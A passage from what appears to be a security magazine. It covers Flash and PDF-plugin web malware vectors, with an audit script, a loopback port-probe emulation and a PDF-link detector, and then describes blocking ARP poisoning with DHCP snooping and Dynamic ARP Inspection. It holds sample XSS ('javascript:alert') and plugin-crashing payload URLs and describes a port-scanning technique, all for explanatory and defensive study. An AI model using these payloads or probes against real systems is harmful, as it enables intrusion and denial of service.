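            findings.append(("low", f"subdomain wildcard {domain}: every host under it is trusted"))
        if secure == "false":
            findings.append(("medium", f'secure="false" for {domain}: SWFs loaded over HTTP may read HTTPS data'))

    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" or hdr.get("headers") == "*":
            findings.append(("medium", "arbitrary domains may send arbitrary request headers"))
    return findings


def worst_severity(findings):
    """Numeric worst severity (3 = high, 0 = nothing found), handy for gating."""
    return max((SEVERITY[s] for s, _ in findings), default=0)


if __name__ == "__main__":
    for name, policy in (("wildcard", WILDCARD_POLICY), ("mixed", MIXED_POLICY),
                         ("tight", TIGHT_POLICY)):
        print(f"== {name} policy, worst severity {worst_severity(audit_crossdomain(policy))}")
        for sev, msg in audit_crossdomain(policy):
            print(f"  [{sev}] {msg}")
```

Run against a real site, the script would be fed the body of http://host/crossdomain.xml; the wildcard sample reproduces the situation Grossman's survey counted, while the tight sample shows what a reviewed policy should look like.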

These relaxations can result in the user's browser being redirected from goodsite.com to badsite.com. Thus malware authors can intentionally redirect the user's browser to a malicious website by way of a trusted, legitimate one. Once an attacker succeeds in running JavaScript in your browser through such a Flash advertisement, very bad things can happen. Decentralized website content and cross-domain interactions increase the chances of a security breach and of Web malware propagation. Furthermore, in ActionScript 3 Adobe introduced the SecurityErrorEvent, which Flash Player dispatches whenever a Socket tries to connect to a host and port that policy does not allow. For example, when the ActionScript in Listing 1 tries to make a socket connection to localhost, it results in a security sandbox error.

Before allowing such a connection, Flash Player opens the TCP connection and, if a service is listening on that port, writes the string <policy-file-request/> and waits for the service to respond with a socket policy file. Ordinarily no TCP service will respond, but the behaviour can be abused to simulate a port scan: a closed port fails immediately, while an open port leaves the player waiting. Because of this design flaw in the ActionScript 3 socket handling mechanism, compiled Flash movies were able to scan for open TCP ports on any host reachable from the host running the SWF, bypassing the Flash Player security sandbox model. A demonstration of this port scanning can be seen at http://scan.flashsec.org. These features and techniques have been used successfully by malware authors to devise new and sophisticated attack methodologies.

Figure 12. Genuine Looking Description

Figure 13. Rogue Spyware Download Window (Firefox dialog text: "Opening AntiVirProtectSetup.exe. You have chosen to open AntiVirProtectSetup.exe, which is a: Application, from: http://www.antivirprotect.com", with Save File and Cancel buttons)
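The socket policy handshake just described is simple enough to reproduce, and doing so shows why it doubled as a port scanner. The Python below is an added example for this article, not code from the article's author or from Adobe: it performs the same probe Flash Player performed (connect, send "<policy-file-request/>" plus a NUL byte, wait for a NUL-terminated XML policy) and classifies the port from the outcome. The loopback listener stands in for a remote service and SAMPLE_POLICY is constructed for the demo; a real Flash Player also consulted a master policy on port 843 first, which this emulation leaves out.

```python
"""Emulate the Flash Player socket policy-file probe and its port-scan side effect.

Added example for this article (not the author's or Adobe's code).
The loopback listener is a stand-in for a real network service.
"""
import socket
import threading

POLICY_REQUEST = b"<policy-file-request/>\x00"
# Constructed sample socket policy returned by the demo listener.
SAMPLE_POLICY = (b'<?xml version="1.0"?>'
                 b'<cross-domain-policy>'
                 b'<allow-access-from domain="*" to-ports="8080" />'
                 b'</cross-domain-policy>\x00')


def parse_policy_response(data):
    """Return the policy XML text if data is a NUL-terminated policy, else None."""
    if not data.endswith(b"\x00"):
        return None
    text = data[:-1].decode("utf-8", "replace")
    return text if "<cross-domain-policy" in text else None


def probe_port(host, port, timeout=0.5):
    """Classify host:port using the same handshake Flash Player performed."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(POLICY_REQUEST)
            data = b""
            try:
                while not data.endswith(b"\x00") and len(data) < 65536:
                    chunk = s.recv(4096)
                    if not chunk:          # service closed without sending a policy
                        break
                    data += chunk
            except socket.timeout:
                return "open-no-policy"    # something listens but stays silent
            return "open-policy" if parse_policy_response(data) else "open-no-policy"
    except ConnectionRefusedError:
        return "closed"                    # RST came back immediately
    except (socket.timeout, OSError):
        return "filtered"                  # no answer at all within the timeout


def start_listener(reply):
    """Start a loopback TCP listener and return its port.

    reply=SAMPLE_POLICY behaves like a socket policy server;
    reply=None accepts the connection and stays silent like an ordinary service.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.settimeout(2)
            req = b""
            try:
                while len(req) < len(POLICY_REQUEST):
                    chunk = conn.recv(len(POLICY_REQUEST) - len(req))
                    if not chunk:
                        break
                    req += chunk
                if reply is not None and req == POLICY_REQUEST:
                    conn.sendall(reply)
                else:
                    conn.recv(1)           # silent service: hold the connection open
            except socket.timeout:
                pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def unused_port():
    """Pick a loopback port that is currently closed (bind, read, release)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    for label, port in (("policy server", start_listener(SAMPLE_POLICY)),
                        ("silent service", start_listener(None)),
                        ("closed port", unused_port())):
        print(f"{label:14s} 127.0.0.1:{port:<5d} -> {probe_port('127.0.0.1', port)}")
```

The three distinguishable outcomes (refused, silent, answered) are the information a hostile SWF leaked about the victim's network; Adobe's later fix was to require the policy from a dedicated socket policy server before any connection is attempted.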

Drive-By-Download Attacks 

Before describing what we mean by drive-by download, consider a situation in which the rogue security software mentioned above gets installed on a system automatically, instead of depending on the user to trust it, download it and install it. Scary, isn't it? But we live in an age where such things are part of reality. These days, Web malware does not even depend on the user's intervention to be downloaded onto the system; the download can happen automatically, without the user's knowledge. This is called a drive-by download. A drive-by download can happen by visiting an infected website, viewing a specially crafted e-mail message or even by clicking a deceptive popup window. Google Research reported that, of the billions of web pages they investigated, more than 3 million unique URLs on over 180,000 web sites automatically install malware through drive-by downloads. The worst part is that these statistics are increasing day by day.

To understand how a drive-by download happens, we must focus on the technique a little more. The malware author hosts a malicious website containing exploit code and sends victims its URL. When a user visits the link, the exploit code triggers a memory-corruption vulnerability (typically a buffer overflow) in the vulnerable browser, or in one of its plugins, and gains code execution. This code, as devised by the malware author, silently downloads a predefined malware payload from a predefined location onto the victim's computer and executes it. This is how a system can get infected without the user's knowledge.

As we can see, for a drive-by download attack to succeed, some exploitable vulnerability (most often a buffer overflow or similar memory corruption) has to exist and result in malicious code execution; even Web malware depends on a vulnerability on the victim's computer. What is notable is that, more than OS vulnerabilities, it is browser-related vulnerabilities that are being targeted, because the exploitation happens when the victim's browser parses a malicious piece of code on the malicious website. Hence we can now relate to what we meant when we said that nowadays malware authors focus on the application layer more than on the underlying OS or platform. The trend has completely changed, as more and more malware targets unfixed vulnerabilities in the client's browser or in browser components and plugins. The increase in drive-by download attacks can be associated with the increase in the number of vulnerable Web applications and in the number of vulnerabilities in browsers and browser plugins or components. As we saw earlier, according to the latest IBM ISS X-Force malware report, in 2008 54.9 percent of all disclosed vulnerabilities were Web application vulnerabilities, and 74 percent of the Web application vulnerabilities disclosed had no patch by year end.

It was reported that IE was responsible for 43 percent of all reported Web browser vulnerabilities during the second half of 2008; Firefox accounted for 39 percent, Apple Safari for 10 percent and Opera for 9 percent. The Common Vulnerabilities and Exposures (CVE) list carries entries such as CVE-2009-3077, CVE-2009-3079 and CVE-2009-3069 that describe vulnerabilities in Mozilla Firefox which could allow an attacker to crash a victim's browser and run arbitrary code on the victim's computer. Mozilla confirmed that these vulnerabilities could be used for drive-by download attacks, and the issues were recently patched. Similarly, CVE-2008-4844 describes a vulnerability in Internet Explorer which could allow remote code execution if a user views a specially crafted Web page. Microsoft acknowledged the issue and released Security Bulletin and update MS08-078 to address it.

Listing 1. Example ActionScript Code

package
{
    import flash.display.Sprite;
    import flash.net.Socket;

    public class SocketSandboxError extends Sprite
    {
        private var _connection:Socket;

        public function SocketSandboxError()
        {
            _connection = new Socket();
            // connect() triggers the policy-file check; without a socket policy
            // allowing localhost:8080 the player dispatches SecurityErrorEvent
            _connection.connect("localhost", 8080);
        }
    }
}

Error #2044: Unhandled SecurityErrorEvent:. text=Error #2048: Security sandbox violation: file:///C|/Stuff/FlashTest/src/SocketSandboxError.swf cannot load data from localhost:8080.
    at SocketSandboxError$iinit()

Drive-by download attacks do not only happen because of Web browser vulnerabilities. Another major area of concern is the various browser plugins and components installed to enrich the browsing experience. Vulnerable plugins and components can be exploited by malicious websites and result in drive-by downloads. Secunia Advisory SA35948 (released 23 July 2009) describes the following vulnerabilities in the Adobe Flash Player browser plugin, which can also be used by an attacker to launch drive-by download attacks:

• An unspecified error can be exploited to gain escalated privileges.

• A use-after-free error when parsing Shockwave Flash files may leave references pointing to a deleted object, which can be exploited to corrupt memory.

• An unspecified error may lead to a null pointer vulnerability.

• An unspecified error may lead to a stack overflow vulnerability.

• An error in the parsing of URLs can be exploited to cause a heap-based buffer overflow.

• An integer overflow error in the AVM2 abcFile parser when handling the intrf_count value of the instance_info structure can be exploited to corrupt memory and execute arbitrary code.

Security firm Trusteer has reported that 84 percent of the 2.5 million systems it monitored as part of the company's Rapport security service had a vulnerable version of the Adobe Reader plugin, and around 80 percent had a vulnerable version of Adobe Flash Player installed. Until a fix arrives, such vulnerable versions are extensively exploited by malware authors, who inject exploit code into the file types intended to be rendered in the victim's Web browser. Let us now see some ways in which these browser plugins and components can be used as attack vectors.

Adobe Acrobat PDF Reader 

Once Adobe Reader is installed on a system, it also installs a browser plugin (an ActiveX control for Internet Explorer, an NPAPI plugin for Firefox and other browsers) that integrates with the browser so that PDF documents can be parsed and opened in the browser window itself. This enriches the overall browsing experience: we no longer have to open PDF documents manually in a separate reader, because the plugin displays them in the browser window automatically. However, certain interesting things are also possible. Say, for example, you want to zoom a PDF document; you can do so directly from the URL itself (refer to the link): http://www.malwareinfo.org/files/HowVirusLoads.pdf#zoom=120 (see Figure 14).

Similarly, you can navigate to any page of the PDF: http://www.malwareinfo.org/files/HowVirusLoads.pdf#page=4 (see Figure 15).

Figure 14. Control PDF Display Zoom Through URL

Figure 15. Control PDF Display Page Through URL

This makes it easier for authors to target specific sections and pages, so that when the link opens it pinpoints the exact information the author wants to focus on, all from the URL itself. However, with certain vulnerable versions of Adobe Reader it is also possible for malware authors to carry out malicious activities. For example, Adobe Reader versions 7.0.8 and earlier execute script placed in the URL fragment (a reflected Cross Site Scripting (XSS) vulnerability) and will show a JavaScript popup when the following URL is browsed: http://www.malwareinfo.org/files/HowVirusLoads.pdf#zoom=javascript:alert(0).

Furthermore, passing an unexpectedly long URL fragment full of junk characters can lead to a denial of service (DoS) of the user's browser: a buffer overflow in the plugin's handling of the fragment crashes the browser unexpectedly. A sample link is:

http://www.malwareinfo.org/files/HowVirusLoads.pdf#AAA3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28AAAA%26%230000106%26%230000097%26%230000118%26%2300000%230000041AA%24%24%24%24%24%24%24%24%24%24%2444%5E%5E%5E%24%24***%5E%24%24%24%24%24%24%24%24%23%23%23%23%23%23%23@@@@@@@@%23%23%23%23

A specially crafted URL might also lead to a more severe threat, arbitrary code execution, resulting in drive-by download attacks. If you are using an updated version of the plugin, a malicious URL will not result in arbitrary code execution; rather, the plugin will notify you that the URL associated with the PDF is malformed (see Figure 16).

Figure 16. Acrobat Malformed URL Notification (dialog text: "The URL associated with this PDF is malformed and may not display properly.")

On the 'Net

• Microsoft Security Intelligence Report volume 6 (July - December 2008) - http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en
• Web Attacks: How Hackers Create and Spread Malware - https://www.techwebonlineevents.com/ars/eventregistration.do?mode=eventreg&F=W017l8&K=4ON&cid=well2_webc_
• Kaspersky Security Bulletin (Statistics 2008) - http://www.viruslist.com/en/downloads/vlpdfs/kaspersky_security_bulletin_part_2_statistics_en.pdf
• Kaspersky Monthly Malware Statistics - http://www.viruslist.com/en/analysis?pubid=204792071
• Security Response Blog - http://www.symantec.com/connect/symantec-blogs/security-response
• Google Online Security Blog - http://googleonlinesecurity.blogspot.com
• Google Research - http://research.google.com/archive/provos-2008a.pdf
• Arbor Network Security - http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel
• Commtouch Q2 2009 Internet Threats Trend Report - http://blog.commtouch.com/cafe/data-and-research/q2-internet-threats-trend-report-released
• Panda Security Research - http://research.pandasecurity.com/archive/tags/stats/default.aspx
• F-Secure Web Blog - http://www.f-secure.com/weblog/archives/00001427.html
• ScanSafe Annual Threat Report - http://www.scansafe.com/__data/assets/pdf_file/3005/ScanSafe_-_Annual_Global_Threat_Report2.pdf
• Netcraft October 2008 Web Server Survey - http://news.netcraft.com/archives/2008/10/29/october_2008_web_server_survey.html
• Internet Usage and World Population Statistics 2009 - http://www.internetworldstats.com/stats.htm
• OPA Internet Activity Index - http://www.online-publishers.org/newsletter.php?newsId=556&newsType=pr
• Neil MacDonald - Gartner Blog Network - http://blogs.gartner.com/neil_macdonald
• IBM ISS X-Force Lab Malware Report - http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-report.pdf
• Cyveillance Report - http://www.cyveillance.com/web/docs/WP_CyberIntel_H1_2009.pdf
• Wikipedia (Rogue security software) - http://en.wikipedia.org/wiki/Rogue_security_software
• Google Online Security Blog - http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
• Common Vulnerabilities and Exposures (CVE) - http://www.cve.mitre.org/index.html
• Secunia Advisories - http://secunia.com/advisories
• iDefense Security Advisories - http://labs.idefense.com/intelligence/vulnerabilities
• Web Browser Plugins Vulnerabilities - d0ubl3_h3lix
• Trusteer's Rapport Security Service - http://www.trusteer.com/solution
• FireEye Malware Intelligence Labs - http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html
• Umesh Wanve (Zscaler Security Researcher) - http://research.zscaler.com/2009/09/in-wild-flash-exploit-analysis-part-1.html
• Brian Krebs (Washington Post) - http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_1.html
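A point worth making explicit about the zoom= and page= tricks above: everything after the # in a PDF link is consumed by the Acrobat browser plugin and is never sent to the web server, so neither the javascript: payload nor the oversized junk fragment ever appears in server access logs. Detection therefore has to run on the content that carries the links (web pages, mail bodies, proxy-captured HTML), not on logs. The Python below is an added example for this article, not code from the article's author or from Adobe: it extracts PDF links from text, compares the open parameters against Adobe's documented names (the KNOWN_PARAMS list here is abbreviated), and flags script payloads, unknown parameters and oversized fragments, undoing percent-encoding and HTML entities before matching so that encoded variants such as the one in the DoS sample are caught. The sample HTML and its links are constructed for the demonstration.

```python
"""Flag suspicious open parameters in links to PDF files.

Added example for this article (not the author's or Adobe's code).
SAMPLE_HTML and its links are constructed for the demonstration.
"""
import html
import re
from urllib.parse import unquote, urlsplit

# Open parameters Adobe documents for PDF URLs (abbreviated list, an assumption
# that anything outside it is worth a second look).
KNOWN_PARAMS = {"page", "zoom", "nameddest", "view", "viewrect", "pagemode",
                "scrollbar", "toolbar", "statusbar", "navpanes", "search",
                "highlight", "comment", "collab", "messages", "fdf"}
MAX_FRAGMENT = 256   # generous upper bound for a legitimate fragment
URL_RE = re.compile(r"""https?://[^\s"'<>]+?\.pdf(?:#[^\s"'<>]*)?""", re.I)
SCRIPT_RE = re.compile(r"javascript\s*:|alert\s*\(|eval\s*\(", re.I)

SAMPLE_HTML = """
<a href="http://www.example.com/files/report.pdf#page=4">page 4</a>
<a href="http://www.example.com/files/report.pdf#zoom=120">zoom</a>
<a href="http://www.example.com/files/report.pdf#zoom=javascript:alert(0)">xss</a>
<a href="http://www.example.com/files/report.pdf#zoom=%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74:alert(1)">encoded</a>
<a href="http://www.example.com/files/report.pdf#AAAA%24%24%24%5E%5E%5E%23%23%23%23@@@@%24%24%24%24%24%24%24%24">junk</a>
"""


def decode_layers(value, rounds=3):
    """Strip percent-encoding and HTML entities repeatedly (catches double encoding)."""
    for _ in range(rounds):
        new = html.unescape(unquote(value))
        if new == value:
            break
        value = new
    return value


def analyse_pdf_link(url):
    """Return the reasons a PDF link looks malicious; an empty list means clean."""
    reasons = []
    frag = urlsplit(url).fragment
    if not frag:
        return reasons
    if len(frag) > MAX_FRAGMENT:
        reasons.append(f"fragment length {len(frag)} exceeds {MAX_FRAGMENT}")
    for part in frag.split("&"):
        name, _, value = part.partition("=")
        if name.lower() not in KNOWN_PARAMS:
            reasons.append(f"unknown open parameter {name[:40]!r}")
        decoded = decode_layers(value)
        if SCRIPT_RE.search(decoded):
            reasons.append(f"script payload in {name.lower()}: {decoded[:60]!r}")
    return reasons


def scan_text(text):
    """Map every flagged PDF link found in text to its list of reasons."""
    flagged = {}
    for match in URL_RE.finditer(text):
        reasons = analyse_pdf_link(match.group(0))
        if reasons:
            flagged[match.group(0)] = reasons
    return flagged


if __name__ == "__main__":
    for url, reasons in scan_text(SAMPLE_HTML).items():
        print(url)
        for reason in reasons:
            print("   -", reason)
```

The checker is deliberately conservative about parameter names: a plain #page=4 or #zoom=120 passes, while anything the plugin would not recognise is reported even when no script pattern matches, which is how the long junk fragment from the DoS example gets caught.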

Adobe acknowledged the above vulnerability and provided an update to resolve it in Adobe Reader and Acrobat: Security Bulletin APSB07-01 addresses this Cross Site Scripting (XSS) vulnerability in versions 7.0.8 and earlier of Adobe Reader and Acrobat. iDefense Security Advisory CVE-2009-2991 (released 13 October 2009) describes a similar vulnerability in the Acrobat and Reader Firefox plugin which could allow an attacker to execute arbitrary code. iDefense confirmed the existence of this vulnerability in Acrobat and Reader versions 8.1.3, 8.1.4, 8.1.5 and 8.1.6; previous versions are also likely to be affected.
Adobe Flash Player

We pointed out earlier that, according to the statistics presented by security firm Trusteer, around 80 percent of users have a vulnerable version of Adobe Flash Player installed. Flash is supported on around 850 million internet-connected desktops. With so much Flash content on the internet, for example on video sites, on social networking sites and in advertisements, this is a potentially very dangerous malware propagation channel: one piece of malware created to infect a computer by exploiting any of these Flash vulnerabilities has the scope to infect all of those 850 million systems. In 2009 alone, 29 vulnerabilities were reported. The link below gives an insight into the large number of critical Flash-related vulnerabilities reported (166 CVE entries) between 2001 and 2009: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Flash.

On 22 July 2009 Adobe released Security Advisory APSA09-03 for CVE-2009-1862, a critical vulnerability in the then-current versions of Flash Player (10.0.22.87 and earlier) for Windows, Macintosh, Linux and Solaris. Of all the past and existing vulnerabilities identified, this is perhaps the most recent (as of this writing) that is rumored to be causing widespread attacks. The shocking part of the story is that 48 percent, almost half, of all Flash vulnerabilities reported to date have been exploited to achieve arbitrary code execution. Although Adobe has recommended that all users of Flash Player 10.0.22.87 and earlier upgrade to the newest version, 10.0.32.18, going back to Trusteer's findings it is believed that this remains a major threat in the wild. Such Flash exploits have been known to use the heap spraying technique, implemented in JavaScript, to achieve arbitrary code execution. Heap sprays have been used in exploits since 2001, but since 2005 the technique has seen much more widespread use in exploits that deliver Web malware.

Sun Java Plugin 

Note

A lot of information has also been compiled from various other freely available sources on the internet. Resemblance of any other article to this article is purely coincidental and unintentional.

Similar to the Adobe Flash and Adobe Acrobat Reader vulnerabilities mentioned above, it was also reported that vulnerabilities in the Sun Java Plug-in were making users susceptible to serious attacks. Secunia Advisory SA34451 (released 26 March 2009) describes the following vulnerabilities in the Sun Java Plug-in, which can be used by an attacker to execute arbitrary code, read/write/execute local files or even access local system ports:

• An error in the Java Plug-in when deserializing 
applets can be exploited to e.g. read, write, or 
execute local files. 

• The Java Plug-in allows JavaScript code loaded 
from the local system to connect to arbitrary local 
ports. This can be exploited in combination with 
cross-site scripting attacks to access normally 
restricted local ports. 

• An integer overflow error in JRE when processing
PNG splash screen images can be exploited by an
untrusted Java Web Start application to cause a buffer
overflow and potentially execute arbitrary code.

• An error in JRE when processing GIF splash 
screen images can be exploited by an untrusted 
Java Web Start application to cause a buffer 
overflow and potentially execute arbitrary code. 

• An error in JRE when processing GIF images can 
be exploited by an untrusted applet or an untrusted 
Java Web Start application to cause a buffer 
overflow and potentially execute arbitrary code. 

• A signedness error in JRE when processing Type1
fonts can be exploited to corrupt heap
memory and potentially execute arbitrary code.

The biggest challenge associated with these vulnerable
browser plugins and components is that the Web
browser software itself may not be vulnerable; instead
these plugins are, and until the vendors of these plugins
or components fix them, the end users will remain
vulnerable. So the more internet users access the
various Websites and Web related technologies, the
larger the target audience these Malwares get. So, logically,
any Malware that is created to infect a computer by
exploiting any of these vulnerabilities has the scope of
infecting all the systems that have the said vulnerable
plugin/component installed.

In this section we saw the techniques of infection
related to Web Malwares. We also saw some
of the tricks or flaws which are used by the Malware
authors and how vulnerable browsers, vulnerable
browser plugins or components or even vulnerable
Web applications unknowingly help keep the threat
of Web Malware alive. In the third and concluding
section, Web Malwares (Part 3), we will focus on some
of the interesting methodologies which are commonly
used in Web Malwares.
ATTACK

Defeating Layer-2 attacks in VoIP

ARP Poisoning and other Layer 2 attacks have been present
for many decades now and one may think that they are
obsolete. However, we still see them quite often on the
network. The biggest advantage is easy access to sensitive
information like passwords, credit card details, phone
conversations etc.



What you will learn...

• How to securely implement ARP Poisoning preventive
measures in your network

What you should know...

• Understanding of ARP Poisoning attacks
• Familiarity with Cisco command line interface



Many tools like Ettercap, Cain & Abel, DSniff,
trapper etc. were written to carry out ARP
Poisoning attacks. Ettercap and Cain & Abel are the most
popular ones. Since Ettercap is open source and flexible,
many new small tools have evolved from it targeting
specific protocols. One of them is UCSniff.

In this article, we will see how to block UCSniff and
thereby all other ARP Poisoning tools.

VoIP is picking up in almost all scales of industries.
Due to its cost effective and feature rich solution,
many industries have already adopted it as their
primary communication system. However, if one
asks VoIP vendors and adopters about their biggest
VoIP security risk, the obvious answer would be
eavesdropping. It's a breach of the confidentiality of
the communication and can cause huge business
impact.

Unified Communication Sniffer (UCSniff) is a next
generation VoIP sniffing tool from VIPER Lab. It can
smoothly detect and sniff ongoing audio/video call
sessions between the IP phones and store the media in
.wav and .avi files. It can also capture voice mail PIN codes
and alter phone settings.

Views expressed in this article are personal to the author 
and do not necessarily reflect the opinions of other experts 
and Microsoft Corporation. 



Considering eavesdropping as one of the biggest
threats to VoIP networks, UCSniff proves to be an
extremely dangerous tool which an attacker wishes
to have in his arsenal. UCSniff supports automatic
recording and saves conversations using the G.722,
G.729, G.726 and G.723 codecs. Its latest version can
intercept H.264 video traffic too. Though Wireshark
can also decode and store VoIP payload and create an audio
file out of it, it's a tedious process if multiple calls are
involved in the packet capture. UCSniff makes all this
very simple.

These are some of the implications of tools
like UCSniff. But how do we protect our network from
them and mitigate the risk? This is what the article is all
about... Defeating UCSniff ;) The security measures
explained here can also be used to defeat similar
tools like Ettercap, VideoJak, Cain & Abel, trapper
etc.

Before we delve into mitigation techniques, I would
like to brief you about UCSniff and its architecture. UCSniff
is nothing but a stripped down version of Ettercap with
VoIP protocol dissectors. Ettercap is a well-known
multipurpose sniffer and logging utility for switched
LANs. It is also used to implement MITM attacks in
a networked environment. Ettercap has different
user interfaces, viz. Text, Ncurses and GTK.
UCSniff has removed the Ncurses and GTK display
interfaces along with most of the protocol dissectors
and plugins.
So the key essence of UCSniff is ARP Poisoning. It
performs the Man-in-the-Middle (MITM) attack using the ARP
Poisoning techniques of Ettercap and sniffs/dumps the
VoIP calls.

So, in order to defeat UCSniff, the network admin needs
to protect his network from ARP Poisoning attacks.
I am going to show you a few techniques that can be
used to defeat UCSniff and similar tools based on ARP
Poisoning.

Figure 2. UCSniff in action

Figure 3. Configuring DHCP Snooping (console screenshot; the
commands readable in it are configure terminal, ip dhcp snooping,
ip dhcp snooping vlan 20, interface fastethernet 0/... and a second
ip dhcp snooping ... command on that interface, both cut off in the
scan, then end)

Figure 4. DHCP snooping bindings (screenshot of show ip dhcp snooping
binding: two dhcp-snooping entries on VLAN 20 for 172.16.20.2 and
172.16.20.3, Total number of bindings: 2)

Figure 5. DHCP Snooping Logs (console screenshot; the readable lines are)
    %SW_DAI-4-PACKET_RATE_EXCEEDED: 16 packets received in 184 milliseconds on Fa0/3
    %PM-4-ERR_DISABLE: arp-inspection error detected on Fa0/3, putting Fa0/3 in err-disable state
    %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/3, changed state to down
    %LINK-3-UPDOWN: Interface FastEthernet0/3, changed state to down

I have a small VoIP lab consisting of a Cisco Catalyst
3560 series switch along with 4 VoIP phones. Two of
them have video capabilities. All phones are registered
with a sipXecs server, an open source IP PBX. The
topology can be seen in Figure 1.

Let's run UCSniff without any ARP
protection and see the impact on audio/video
conversations.

Figure 2 shows UCSniff eavesdropping on a
VoIP audio/video call using its Live Monitor
feature, thereby dumping the audio/video into the
respective .wav and .avi files.

Figure 2 also shows the number of
hosts enumerated by UCSniff. Keep a note
of this number; we will need it afterwards. We
just saw how easily UCSniff can spy on our
calls.

Before we do any security configurations 
on our Cisco 3560 switch, let me brief you 
about the security features which we will be 
using to prevent ARP attacks. 

• DHCP Snooping 

• Dynamic ARP Inspection (DAI) 



DHCP Snooping 

DHCP snooping is a DHCP security feature
that provides security by filtering untrusted
DHCP messages and by building and
maintaining a DHCP snooping binding
table.

An untrusted message is one that is
received from outside the network or
firewall and can cause traffic
attacks within your network. DHCP snooping
acts like a firewall between untrusted hosts
and DHCP servers.

DHCP snooping classifies interfaces
as either trusted or untrusted. DHCP
messages received on trusted interfaces
are permitted to pass through the Cisco
switch, but DHCP messages received
on an untrusted interface of a Cisco switch
result in the interface being put into the error-
disabled state.

Let's enable DHCP Snooping security 
feature for VLAN 20 on my lab switch as 
shown in figure 3. 

Figure 4 shows the DHCP Snooping 
binding database having 2 entries of my 
Grandstream phones. 

The DHCP snooping binding table contains
the MAC address, IP address, lease time,
binding type, VLAN number, and interface information
that corresponds to the local untrusted interfaces of
a switch; it does not contain information regarding hosts
interconnected with a trusted interface.

Dynamic ARP Inspection (DAI) 

DAI is a security feature that validates ARP packets 
in a network. DAI intercepts, logs, and discards ARP 
packets with invalid IP-to-MAC address bindings. This 
capability protects the network from some Man-in- 
the-middle attacks. DAI ensures that only valid ARP 
requests and responses are relayed. 

When DAI is enabled, the switch performs these
activities:

• Intercepts all ARP requests and responses on
untrusted ports

• Verifies that each of these intercepted packets has
a valid IP-to-MAC address binding before updating
the local ARP cache or before forwarding the
packet to the appropriate destination

• Drops invalid ARP packets

Figure 6. Enabling Dynamic ARP Inspection

Figure 7. UCSniff defeated successfully

Figure 8. Switch port status after successful block

Figure 9. Logs after successful ARP poison block (console screenshot;
the readable lines are five repetitions, at 05:10:17, 05:10:18, 05:10:20,
05:10:22 and 05:10:24, of)
    %SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Req) on Fa0/4, vlan 20. ([000c.29c2.8152/0.0.0.0/0000.0000.0000/169.254.6.67/05:10:17 UTC Wed Mar 3 1993])
(the last two entries show the sender IP 169.254.6.67 in place of 0.0.0.0)

DAI determines the validity of an ARP packet based
on the valid IP-to-MAC address bindings stored in
the DHCP snooping binding database. If the ARP
packet is received on a trusted interface, the switch
forwards the packet without any checks. On untrusted
interfaces, the switch forwards the packet only if it is
valid.

DAI associates a trust state with each interface 
on the switch. Packets arriving on trusted interfaces 
bypass all DAI validation checks, and those arriving 
on untrusted interfaces undergo the DAI validation 
process. 

The following screenshots show the Dynamic
ARP Inspection configuration on my lab
switch.

In a typical network configuration, you
configure all switch ports connected to hosts
as untrusted and all switch
ports connected to switches as trusted. With
this configuration, all ARP packets entering
the network from a given switch bypass the
security check. By default all the switch ports
are configured as untrusted.

With these security measures in place, let's
run UCSniff again and see the result.

I have plugged my laptop into switch port
Fa0/3 with IP address 172.16.20.7.

The adjacent screenshot shows UCSniff was
able to detect only one host, which is the
gateway. Why has this happened?
Let's have a look at the switch console.

Note the line %SW_DAI-4-PACKET_RATE_EXCEEDED:
in the above console log screenshot. It
also shows an arp-inspection error detected
on interface Fa0/3; its link state has
changed to down and my laptop is kicked
out of the network. This has happened
because of the rate limiting module of the DAI
feature.



Rate Limiting of ARP Packets

The switch performs DAI validation checks,
which rate limit incoming ARP packets
to prevent a Denial-of-Service attack. By
default, the rate for untrusted interfaces is 15
packets per second (pps).

Trusted interfaces are not rate limited.
You can change this setting by using the ip
arp inspection limit interface configuration
command.

When the rate of incoming ARP packets exceeds the
configured limit, the switch places the port in the error-
disabled state. The port remains in that state until you
intervene.

Figure 10. Interface Recovery after successful block

I plugged my laptop into Fa0/4 and Fa0/5, ran UCSniff
and got similar results. The following screenshot shows
the status of all the switch interfaces from which I ran
UCSniff.

Now the obvious question that arises is that the rate
limiting module will defeat UCSniff, but what about
tools which perform ARP poisoning slowly and do not
scan for target hosts?

Let's try this scenario and poison a single host by
sending fake ARP request/reply packets. As ARP
poisoning a single host needs only 2 spoofed ARP
packets, the rate limiting module will not trigger and we
should be able to get around the DAI feature,
right? But it failed again :) How? Let's check the switch
console in the following screenshots.

The line %SW_DAI-4-DHCP_SNOOPING_DENY from the
screenshot explains everything. When we send an ARP
reply with a spoofed MAC address, the switch checks the
ARP packet against the DHCP snooping binding table
and drops the packet as the MAC/IP pair does not match
the table entries, defeating the ARP attack.
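The two DAI decisions described in the rate limiting section and in the paragraph above (a burst of ARP packets on an untrusted port puts the port into err-disable; a single spoofed reply whose sender IP/MAC pair is not in the DHCP snooping binding table is dropped with a DHCP_SNOOPING_DENY) can be modelled in a few lines. The following is an added illustration written for this page, not Cisco's implementation or anything from the article; the binding table, port names, MAC addresses and packet timings are constructed sample values, and the log lines are modelled on the ones in the screenshots.

```python
"""Model of the two DAI decisions the article describes: per-port ARP rate
limiting and validation of the ARP sender against the DHCP snooping binding
table. Added illustration, not Cisco's code; all values below are constructed."""
from collections import defaultdict
from dataclasses import dataclass, field

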